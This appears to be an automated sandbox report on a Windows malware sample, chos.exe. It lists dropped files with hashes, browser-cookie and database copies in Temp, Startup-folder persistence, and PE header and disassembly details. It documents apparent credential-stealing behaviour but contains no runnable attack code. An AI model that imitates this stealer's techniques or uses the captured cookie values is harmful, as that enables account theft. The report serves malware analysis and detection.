File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	2153
Entropy (8bit):	5.088249746074878
Encrypted:	false
SSDEEP:	48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
MD5:	EBEA27DA14E3F453119DC72D84343E8C
SHA1:	7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
SHA-256:	59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
SHA-512:	A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info\RECORD

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	4557
Entropy (8bit):	5.714200636114494
Encrypted:	false
SSDEEP:	96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
MD5:	44D352C4997560C7BFB82D9360F5985A
SHA1:	BE58C7B8AB32790384E4E4F20865C4A88414B67A
SHA-256:	783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
SHA-512:	281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
Malicious:	false
Preview:	../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.672346887071811
Encrypted:	false
SSDEEP:	3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
MD5:	24019423EA7C0C2DF41C8272A3791E7B
SHA1:	AAE9ECFB44813B68CA525BA7FA0D988615399C86
SHA-256:	1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
SHA-512:	09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.

C:\Users\user\AppData\Local\Temp\_MEI98882\setuptools\_vendor\wheel-0.43.0.dist-info\entry_points.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.271713330022269
Encrypted:	false
SSDEEP:	3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
MD5:	6180E17C30BAE5B30DB371793FCE0085
SHA1:	E3A12C421562A77D90A13D8539A3A0F4D3228359
SHA-256:	AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
SHA-512:	69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
Malicious:	false
Preview:	[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..

C:\Users\user\AppData\Local\Temp\_MEI98882\sqlite3.dll

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1540368
Entropy (8bit):	6.577233901213655
Encrypted:	false
SSDEEP:	24576:cmKZpHTv4iPI9FDgJNRs++l8GwLXSz4ih5Z5jWbsxuIl40OwumzuLxIhiE:0rJoDgJNRs+U8GwLXSMIZ5jWb0uIl48R
MD5:	7E632F3263D5049B14F5EDC9E7B8D356
SHA1:	92C5B5F96F1CBA82D73A8F013CBAF125CD0898B8
SHA-256:	66771FBD64E2D3B8514DD0CD319A04CA86CE2926A70F7482DDEC64049E21BE38
SHA-512:	CA1CC67D3EB63BCA3CE59EF34BECCE48042D7F93B807FFCD4155E4C4997DC8B39919AE52AB4E5897AE4DBCB47592C4086FAC690092CAA7AA8D3061FBA7FE04A2
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).0...(.......................................................P....`..............................................#...........`...............R.../...p..X...0...T..............................@............@..X............................text...9........0.................. ..`.rdata..,....@.......4..............@..@.data...`M...0...D..................@....pdata...............\..............@..@.rsrc........`.......8..............@..@.reloc..X....p.......B..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI98882\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	709904
Entropy (8bit):	5.861739047785334
Encrypted:	false
SSDEEP:	12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
MD5:	0902D299A2A487A7B0C2D75862B13640
SHA1:	04BCBD5A11861A03A0D323A8050A677C3A88BE13
SHA-256:	2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
SHA-512:	8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\crcookies.txt

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	275
Entropy (8bit):	5.8325387716694586
Encrypted:	false
SSDEEP:	6:Pk3rocHDyzxbiEv3rocHDKJLmIrBNuYraqWTfqgqlB1Hwsv7OjPy:c79EkEv79cBNuMWfqnym7O7y
MD5:	AB7B31497A89CEE58FF7F42012F5A062
SHA1:	9DD69E3FBB93EC045695C41441B4DD89F541298D
SHA-256:	5C95D789D8C24DC5BF5C4D371CC1CA581D3A7FCBC6CC180F244F35BCC937967F
SHA-512:	67235EF3F65278D9F251BA6DEA45EAEC42F56900363E727F90659DF1146BFE673077906015F43F26F93CC43478DDA1F11EADAD865845A75F8FB4C27B66734960
Malicious:	false
Preview:	.google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-08...google.com.TRUE./.FALSE.2597573456.NID.511=orcSInoZBb6Srw0PdPMNeLGKsegfLi-tQnviho5hKJXKDNg0kXIPnfTcuwV5r7RqjT893pWGJF7klKqldBoj4rDJvxfFlgDOCcW9aKDnU9zIlUh2LP0vO8k3uT0gHJD1JvVAclkJnKwZG6hDAl62HrMxNrUeqSR-WF1J-l9YYgE..

C:\Users\user\AppData\Local\Tempcrcwdkskcp.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrdunhhvcy.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrirpgqioc.db

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrisonoqei.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8475592208333753
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
MD5:	BE99679A2B018331EACD3A1B680E3757
SHA1:	6E6732E173C91B0C3287AB4B161FE3676D33449A
SHA-256:	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
SHA-512:	9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrjbsgogsc.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrkjdmhjtp.db

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrmgbotbit.db

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrmivkfzbe.db

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrprysjzmw.db

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempcrzjllkust.db

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1373607036346451
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
MD5:	64BCCF32ED2142E76D142DF7AAC75730
SHA1:	30AB1540F7909BEE86C0542B2EBD24FB73E5D629
SHA-256:	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
SHA-512:	0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chos.exe

Download File

Process:	C:\Users\user\Desktop\chos.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	17703403
Entropy (8bit):	7.994253774396037
Encrypted:	true
SSDEEP:	393216:2QK+9YiZAwq3Obs2CltXMCHWUj/cuIbvR/PqK1yXms56YjZCro:3K+9YiZAwq3ObRqtXMb8Ut/iKb4Cro
MD5:	C93BC8DCDB9B8C4B49B429B64C182B92
SHA1:	C3F242A8B0EEA955E86A95D95E08FB417AC553F2
SHA-256:	125E6A6964BE32FBC935900B7DE62513A0D6CD19C50A51A11B272636FD895EA6
SHA-512:	731016910D196F1872B365B0D80AF0801B1A9E1B6202965AA61080CF461429F507EBCCC2D5DD938CA0748E96A1F532E66A2ADB14A4BFFB688EAB49D1037E273F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d.....Rg.........."....)............ ..........@............................. .......}....`.................................................4...x....p.......@..8"..............d...................................@...@............................................text...p........................... ..`.rdata..(*.......,..................@..@.data....S..........................@....pdata..8"...@...$..................@..@.rsrc........p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.994253774396037
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	chos.exe
File size:	17'703'403 bytes
MD5:	c93bc8dcdb9b8c4b49b429b64c182b92
SHA1:	c3f242a8b0eea955e86a95d95e08fb417ac553f2
SHA256:	125e6a6964be32fbc935900b7de62513a0d6cd19c50a51a11b272636fd895ea6
SHA512:	731016910d196f1872b365b0d80af0801b1a9e1b6202965aa61080cf461429f507ebccc2d5dd938ca0748e96a1f532e66a2adb14a4bffb688eab49d1037e273f
SSDEEP:	393216:2QK+9YiZAwq3Obs2CltXMCHWUj/cuIbvR/PqK1yXms56YjZCro:3K+9YiZAwq3ObRqtXMb8Ut/iKb4Cro
TLSH:	2C073305E2E06CDBDBB25538FE65E1D4A4897F660F7CC61B5670730A0AB30C1987AE1B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

File Icon


Icon Hash:	1262a1a0aa92aa8a

Static PE Info

General

Entrypoint:	0x14000ce20
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x67520AF3 [Thu Dec 5 20:20:03 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F9CDD16C30Ch
dec eax
add esp, 28h
jmp 00007F9CDD16BF2Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F9CDD16C6D8h
test eax, eax
je 00007F9CDD16C0D3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F9CDD16C0B7h
dec eax
cmp ecx, eax
je 00007F9CDD16C0C6h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007F9CDD16C0A0h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F9CDD16C0A9h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F9CDD16C0B9h
mov byte ptr [000356F5h], 00000001h
call 00007F9CDD16B805h
call 00007F9CDD16CAF0h
test al, al
jne 00007F9CDD16C0B6h
xor al, al
jmp 00007F9CDD16C0C6h
call 00007F9CDD17960Fh
test al, al
jne 00007F9CDD16C0BBh
xor ecx, ecx
call 00007F9CDD16CB00h
jmp 00007F9CDD16C09Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007F9CDD16C119h
cmp ecx, 01h
jnbe 00007F9CDD16C11Ch
call 00007F9CDD16C64Eh
test eax, eax
je 00007F9CDD16C0DAh
test ebx, ebx
jne 00007F9CDD16C0D6h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007F9CDD179402h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca34	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x19a1c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2238	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x61000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f70	0x2a000	b8c3814c5fb0b18492ad4ec2ffe0830a	False	0.5518740699404762	data	6.489205819736506	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a28	0x12c00	c8d83649a00600a4564b119eb853a167	False	0.5242838541666667	data	5.750751049546784	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2238	0x2400	9cd1eac931545f28ab09329f8bfce843	False	0.4697265625	data	5.2645170849678795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x19a1c	0x19c00	35db13bd970349e79d066a52e38a415a	False	0.07967991504854369	data	3.7032712285528175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x61000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x471d8	0xdcf	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.925035360678925
